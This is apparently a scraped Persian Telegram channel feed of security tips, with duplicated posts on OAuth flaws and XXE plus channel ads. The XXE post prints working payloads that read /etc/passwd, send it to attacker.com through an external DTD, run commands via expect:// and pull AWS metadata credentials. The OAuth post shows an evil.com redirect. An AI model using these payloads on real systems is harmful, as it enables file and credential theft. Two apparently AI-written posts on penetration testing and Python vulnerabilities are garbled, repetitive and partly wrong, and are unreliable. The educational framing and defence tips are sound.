OAuth، پیچیدهترین سیستم احراز هویت و رایجترین باگش
OAuth چیکار میکنه؟
به یه سایت میگی: "من به تو اجازه میدم از طرف من با گوگل حرف بزنی."
جریان استاندارد:
1. کاربر → درخواست لاگین به target.com
2. target.com → کاربر رو میفرسته به accounts.google.com
3. کاربر → به گوگل لاگین میکنه
4. گوگل → یه کد به target.com میده
5. target.com → با کد، یه توکن از گوگل میگیره
6. target.com → با توکن، اطلاعات کاربر رو میگیره
باگهای رایج:
۱. Open Redirect in redirect_uri
اگه سرور redirect_uri رو اعتبارسنجی نکنه:
https://target.com/oauth/callback?redirect_uri=https://evil.com
توکن میره به evil.com.
۲. CSRF در OAuth
اگه state نداشته باشه یا ثابت باشه،
مهاجم یه درخواست لاگین جعل میکنه که به اکانت مهاجم وصل شه.
قربانی وارد میشه، ولی به حساب مهاجم لاگین میشه.
۳. Implicit Flow
توکن مستقیم تو URL میاد.
تاریخچه مرورگر، Referer، لاگها همه میبیننش.
۴. PKCE نبودن
تو Public Client ها، اگه PKCE نداشته باشه،
کد رهگیری میشه.
۵. Account Linking
اگه یه سایت چند تا روش لاگین داره،
مهاجم میتونه حساب قربانی رو به حساب خودش لینک کنه.
دفاع:
redirect_uri رو دقیقاً match کن، نه با regex.
state رندوم و یکبار مصرف.
PKCE رو حتماً استفاده کن.
از Authorization Code Flow استفاده کن، نه Implicit.
#ℳℴ𝒷𝒾𝓃
OAuth چیکار میکنه؟
به یه سایت میگی: "من به تو اجازه میدم از طرف من با گوگل حرف بزنی."
جریان استاندارد:
1. کاربر → درخواست لاگین به target.com
2. target.com → کاربر رو میفرسته به accounts.google.com
3. کاربر → به گوگل لاگین میکنه
4. گوگل → یه کد به target.com میده
5. target.com → با کد، یه توکن از گوگل میگیره
6. target.com → با توکن، اطلاعات کاربر رو میگیره
باگهای رایج:
۱. Open Redirect in redirect_uri
اگه سرور redirect_uri رو اعتبارسنجی نکنه:
https://target.com/oauth/callback?redirect_uri=https://evil.com
توکن میره به evil.com.
۲. CSRF در OAuth
اگه state نداشته باشه یا ثابت باشه،
مهاجم یه درخواست لاگین جعل میکنه که به اکانت مهاجم وصل شه.
قربانی وارد میشه، ولی به حساب مهاجم لاگین میشه.
۳. Implicit Flow
توکن مستقیم تو URL میاد.
تاریخچه مرورگر، Referer، لاگها همه میبیننش.
۴. PKCE نبودن
تو Public Client ها، اگه PKCE نداشته باشه،
کد رهگیری میشه.
۵. Account Linking
اگه یه سایت چند تا روش لاگین داره،
مهاجم میتونه حساب قربانی رو به حساب خودش لینک کنه.
دفاع:
redirect_uri رو دقیقاً match کن، نه با regex.
state رندوم و یکبار مصرف.
PKCE رو حتماً استفاده کن.
از Authorization Code Flow استفاده کن، نه Implicit.
#ℳℴ𝒷𝒾𝓃
❤4
XXE، وقتی XML بهت اجازه خوندن فایل رو میده
XML یه قابلیت داره به اسم Entity.
میتونی با یه entity، یه مقدار رو چند جا استفاده کنی.
<!DOCTYPE foo [
<!ENTITY example "hello">
]>
<root>&example;</root>
حالا entity میتونه external هم باشه:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
اگه سرور این XML رو پردازش کنه،
محتوای /etc/passwd رو بهت برمیگردونه.
این به تنهایی فاجعهست.
ولی میتونی بری جلوتر.
Blind XXE با OOB:
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
evil.dtd روی سرور مهاجم:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?%file;'>">
%all;
حالا سرور قربانی، محتوای /etc/passwd رو به سرور تو میفرسته.
حتی اگه هیچ چیزی بهت نشون نده.
با PHP Wrapper:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
محتوای فایل base64 میشه.
چون ممکنه XML با کاراکترهای خاص مشکل داشته باشه.
یا با php://expect:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
اگه expect نصب باشه، فرمان اجرا میشه.
SSRF با XXE:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
میره سراغ Metadata ابری.
ممکنه Credentials AWS رو بگیری.
دفاع:
Disable external entities تو Parser.
از فرمتهای دیگه مثل JSON استفاده کن.
Parser رو آپدیت کن.
#ℳℴ𝒷𝒾𝓃
XML یه قابلیت داره به اسم Entity.
میتونی با یه entity، یه مقدار رو چند جا استفاده کنی.
<!DOCTYPE foo [
<!ENTITY example "hello">
]>
<root>&example;</root>
حالا entity میتونه external هم باشه:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
اگه سرور این XML رو پردازش کنه،
محتوای /etc/passwd رو بهت برمیگردونه.
این به تنهایی فاجعهست.
ولی میتونی بری جلوتر.
Blind XXE با OOB:
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
evil.dtd روی سرور مهاجم:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?%file;'>">
%all;
حالا سرور قربانی، محتوای /etc/passwd رو به سرور تو میفرسته.
حتی اگه هیچ چیزی بهت نشون نده.
با PHP Wrapper:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
محتوای فایل base64 میشه.
چون ممکنه XML با کاراکترهای خاص مشکل داشته باشه.
یا با php://expect:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
اگه expect نصب باشه، فرمان اجرا میشه.
SSRF با XXE:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
میره سراغ Metadata ابری.
ممکنه Credentials AWS رو بگیری.
دفاع:
Disable external entities تو Parser.
از فرمتهای دیگه مثل JSON استفاده کن.
Parser رو آپدیت کن.
#ℳℴ𝒷𝒾𝓃
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
❤3👏1💔1
**عنوان:** تست نفوذ در شبکه: یک روش بهنگار برای امنیت سایبری
**متن:**
تست نفوذ (Penetration Test) یک روش بهنگار برای امنیت سایبری است که در آن، یک هکر یا متخصص شبکه به یک شبکه سایبی، با هدف تشخیص نقاط ضعف آن، نفوذ و آسیبهای بالقوه را شناسایی و در نتیجه، راههای جلوگیری را پیشنهاد میکند. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعف و آسیبهای بالقبه است.
**تست نفوذ در چیست؟**
تست نفوذ یک روش بهنگار است که هدفش، شناسایی نقاط ضرفت در شبکه سایبی است. این روش شامل شناسایی نقاط ضعف و آسیبهای بالقبه از نظر فنی، نفوذ به شبکه، و شناسایی نقاط ضعف و آسیبهای بالقبه است. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضرف و آسیبهای بالقبه است.
**چشم**
در تست نفوذ، هکر یا متخصص شبکه سعی میکند که نقاط ضعفی در شبکه را شناسایی و شناسایی. این کار، در تست نفوذ، شامل:
* **شناسایی نقاط ضعفی**: شناسایی نقاط ضعف در شبکه، مانند هابهای باز، هابهای بسته، هابهای فاقد و هابهای رمز شده، و هابهای رمز نشده است.
* **شناسایی نقاط آسیب**: شناسایی آسیبهای بالقبه در شبکه، مانند هابهای رمز شده، هابهای فاقد، هابهای هک شده، و هابهای رمز نشده است.
**مرحله**
در تست نفوذ، شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، و در نتیجه، راههای جلوگیری را پیشنهاد میکنیم. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیبهای بالقبه است.
**مثالها**
در تست نفوذ، یک مثال ساده برای شناسایی نقاط ضعفی، میتوان در شبکه، یک هاب باز یا یک هاب باز را تست کرد. این تست نشان میدهد که نقاط ضعفی در هاب باز، در شبکه، شناسایی میشود.
در تست نفوذ، یک مثال برای شناسایی آسیبهای بالقبه در شبکه، میتوان یک هاب باز را تست کرد. این تست نشان میدهد که آسیبهای بالقبه در هاب باز، در شبکه، شناسایی میشود.
**نتیجه**
در تست نفوذ، شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، و در نتیجه، راههای جلوگیری را پیشنهاد میکنیم. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیبهای بالقبه است.
**نکاتیب**
در تست نفوذ، یک نکتِب برای شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، میتوان در تست نفوذ، یک روش برای شناسایی نقاط ضعفی و آسیبهای بالقبه استفاده کرد. این روش شامل شناسایی نقاط ضعفی و آسیبهای بالقبه است.
**نتیجه**
در تست نفوذ، شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، و در نتیجه، راههای جلوگیری را پیشنهاد میکنیم. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیبهای بالقبه است.
#Ai #KaliLinux #CyberSecurity
**متن:**
تست نفوذ (Penetration Test) یک روش بهنگار برای امنیت سایبری است که در آن، یک هکر یا متخصص شبکه به یک شبکه سایبی، با هدف تشخیص نقاط ضعف آن، نفوذ و آسیبهای بالقوه را شناسایی و در نتیجه، راههای جلوگیری را پیشنهاد میکند. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعف و آسیبهای بالقبه است.
**تست نفوذ در چیست؟**
تست نفوذ یک روش بهنگار است که هدفش، شناسایی نقاط ضرفت در شبکه سایبی است. این روش شامل شناسایی نقاط ضعف و آسیبهای بالقبه از نظر فنی، نفوذ به شبکه، و شناسایی نقاط ضعف و آسیبهای بالقبه است. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضرف و آسیبهای بالقبه است.
**چشم**
در تست نفوذ، هکر یا متخصص شبکه سعی میکند که نقاط ضعفی در شبکه را شناسایی و شناسایی. این کار، در تست نفوذ، شامل:
* **شناسایی نقاط ضعفی**: شناسایی نقاط ضعف در شبکه، مانند هابهای باز، هابهای بسته، هابهای فاقد و هابهای رمز شده، و هابهای رمز نشده است.
* **شناسایی نقاط آسیب**: شناسایی آسیبهای بالقبه در شبکه، مانند هابهای رمز شده، هابهای فاقد، هابهای هک شده، و هابهای رمز نشده است.
**مرحله**
در تست نفوذ، شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، و در نتیجه، راههای جلوگیری را پیشنهاد میکنیم. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیبهای بالقبه است.
**مثالها**
در تست نفوذ، یک مثال ساده برای شناسایی نقاط ضعفی، میتوان در شبکه، یک هاب باز یا یک هاب باز را تست کرد. این تست نشان میدهد که نقاط ضعفی در هاب باز، در شبکه، شناسایی میشود.
در تست نفوذ، یک مثال برای شناسایی آسیبهای بالقبه در شبکه، میتوان یک هاب باز را تست کرد. این تست نشان میدهد که آسیبهای بالقبه در هاب باز، در شبکه، شناسایی میشود.
**نتیجه**
در تست نفوذ، شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، و در نتیجه، راههای جلوگیری را پیشنهاد میکنیم. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیبهای بالقبه است.
**نکاتیب**
در تست نفوذ، یک نکتِب برای شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، میتوان در تست نفوذ، یک روش برای شناسایی نقاط ضعفی و آسیبهای بالقبه استفاده کرد. این روش شامل شناسایی نقاط ضعفی و آسیبهای بالقبه است.
**نتیجه**
در تست نفوذ، شناسایی نقاط ضعفی و آسیبهای بالقبه در شبکه سایبی، و در نتیجه، راههای جلوگیری را پیشنهاد میکنیم. این روش در تست نفوذ، بهصورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیبهای بالقبه است.
#Ai #KaliLinux #CyberSecurity
❤4👏1
Spire Team
**عنوان:** تست نفوذ در شبکه: یک روش بهنگار برای امنیت سایبری **متن:** تست نفوذ (Penetration Test) یک روش بهنگار برای امنیت سایبری است که در آن، یک هکر یا متخصص شبکه به یک شبکه سایبی، با هدف تشخیص نقاط ضعف آن، نفوذ و آسیبهای بالقوه را شناسایی و در نتیجه،…
درحال تست هوش مصنوعی شخصی هستیم دوستان این متن تست است لطفا توجه نکنید.
❤5👏1
❤2👏1
Spire Team pinned «اگر لیست تبادل میشناسین معرفی کنین یا اگر کانالی دارید بالای 5k بیایین تبادل کنیم @net_activenull»
سرمئیت سایبری: آسیبپذیری در برنامهنویسی با زبان پایتون
در عصر سایبری که همه چیزها دیجیتال شدهاند، آسیبپذیری یک موضوع جدی است. به هرچه تمام باشد، در این مقاله، درباره آسیبپذیریهایی که در برنامههای نوشته شده به زبان پایتون میتوان با آنها ملاقات کرد.
آسیبپذیریهای برنامههای پایتون
1. آسیبپذیری از نوع Buffer Overflow: این آسیبپذیری هنگامهای است که هنگامی که یک حافظهی به دراز رسیده و از محدودهی آن بیشتر از حد نصیب میگردد، برنامه را ببخورده میکند.
2. آسیبپذیری از نوع SQL Injection: این آسیبپذیری یک روش نفیز است برای نفیز سایبری در برنامهنویسی. آسیبپذیری SQL Injection، به طور عمدهای به این موضوع کمک میکند که برنامهای که یک سایبری در زبان پایتون است، نفیز کرده و آسیبپذیری را ایجاد کند.
3. آسیبپذیری از نوع Command Injection: این آسیبپذیری هنگامهای است که برنامهای که سایبری است، دستورهای نفیزی را در خود اجرا میکند.
4. آسیبپذیری از نوع File Inclusion: این آسیبپذیری هنگامهای است که برنامهای که سایبری است، فایلهای نفیزی را در خودش فشره میکند.
5. آسیبپذیری از نوع Cross-Site Scripting: این آسیبپذیری هنگامهای است که برنامهای که سایبری است، اطلاعات نفیزی را دریافت میکند.
دستورهای جلوگیر از این آسیبپذیریها
1. Buffer Overflow: به جای استفاده از ورودیهای بینظمی در برنامهها، از ورودیهای چکچشم و چکدار استفاده کنید.
2. SQL Injection: به جای استفاده از ورودیهای نفیزی برای SQL، از ورودیهای چکچشم و چکدار استفاده کنید.
3. Command Injection: در برنامههای پایتون، از ورودیهای چکچشم و چکدار استفاده کنید.
4. File Inclusion: برنامهها را در گونهای که فشردن فایلهای نفیزی را به آنها مجاز نباشد، نوشته تا آسیبپذیری را جلوگیری کنید.
5. Cross-Site Scripting: برنامهها را به گونهای که اطلاعات نفیزی را دریافت نکنند نوشته تا آسیبپذیری را جلوگیری کنید.
در این مقاله، به آسیبپذیریهایی که در برنامههای پایتون میتوان به آنها ملاقات کرد، پرداخته شد. بههمین، با استفاده از دستورهای جلوگیر بالا، این آسیبپذیریها را میتوان جلوگیری کرد.
#Ai
در عصر سایبری که همه چیزها دیجیتال شدهاند، آسیبپذیری یک موضوع جدی است. به هرچه تمام باشد، در این مقاله، درباره آسیبپذیریهایی که در برنامههای نوشته شده به زبان پایتون میتوان با آنها ملاقات کرد.
آسیبپذیریهای برنامههای پایتون
1. آسیبپذیری از نوع Buffer Overflow: این آسیبپذیری هنگامهای است که هنگامی که یک حافظهی به دراز رسیده و از محدودهی آن بیشتر از حد نصیب میگردد، برنامه را ببخورده میکند.
2. آسیبپذیری از نوع SQL Injection: این آسیبپذیری یک روش نفیز است برای نفیز سایبری در برنامهنویسی. آسیبپذیری SQL Injection، به طور عمدهای به این موضوع کمک میکند که برنامهای که یک سایبری در زبان پایتون است، نفیز کرده و آسیبپذیری را ایجاد کند.
3. آسیبپذیری از نوع Command Injection: این آسیبپذیری هنگامهای است که برنامهای که سایبری است، دستورهای نفیزی را در خود اجرا میکند.
4. آسیبپذیری از نوع File Inclusion: این آسیبپذیری هنگامهای است که برنامهای که سایبری است، فایلهای نفیزی را در خودش فشره میکند.
5. آسیبپذیری از نوع Cross-Site Scripting: این آسیبپذیری هنگامهای است که برنامهای که سایبری است، اطلاعات نفیزی را دریافت میکند.
دستورهای جلوگیر از این آسیبپذیریها
1. Buffer Overflow: به جای استفاده از ورودیهای بینظمی در برنامهها، از ورودیهای چکچشم و چکدار استفاده کنید.
2. SQL Injection: به جای استفاده از ورودیهای نفیزی برای SQL، از ورودیهای چکچشم و چکدار استفاده کنید.
3. Command Injection: در برنامههای پایتون، از ورودیهای چکچشم و چکدار استفاده کنید.
4. File Inclusion: برنامهها را در گونهای که فشردن فایلهای نفیزی را به آنها مجاز نباشد، نوشته تا آسیبپذیری را جلوگیری کنید.
5. Cross-Site Scripting: برنامهها را به گونهای که اطلاعات نفیزی را دریافت نکنند نوشته تا آسیبپذیری را جلوگیری کنید.
در این مقاله، به آسیبپذیریهایی که در برنامههای پایتون میتوان به آنها ملاقات کرد، پرداخته شد. بههمین، با استفاده از دستورهای جلوگیر بالا، این آسیبپذیریها را میتوان جلوگیری کرد.
#Ai
❤4👏2
یک ادمین برای تبلیغات و ممبر اوردن میخام حقوق هم از ماه بعدش طبق فعالیتش حقوق میدم بهش کسی بود در خدمتم
@net_activenull
سن بالا بیاد
@net_activenull
سن بالا بیاد
❤3👏1
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai
قابلیتهای گسترده و پیشرفته:
- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیتهاب (GitHub) برای مدیریت کدها و پروژهها، ویکیپدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعهای از سایتهای تخصصی اطلاعاتی و پایگاههای داده، امکان جمعآوری و پردازش حجم عظیمی از دادهها را فراهم میسازد.
- ابزارهای حرفهای OSINT (هوشیابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمعآوری اطلاعات از منابع باز را بهشکل خودکار و دقیق تسهیل میکند. این قابلیت برای تحلیلهای عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصیسازی بالا و انعطافپذیری: کاربران میتوانند با تنظیمات دقیق و شخصیسازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجیها کاملاً متناسب با اهداف آنها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش همزمان درخواستها و پاسخگویی سریع، Nullspire Ai برای انجام پروژههای بزرگ و پیچیده ایدهآل است.
❤6👏1🤣1
HLS.html
5.5 KB
تست کنید بیزحمت 🌹
❤4🔥1👏1🕊1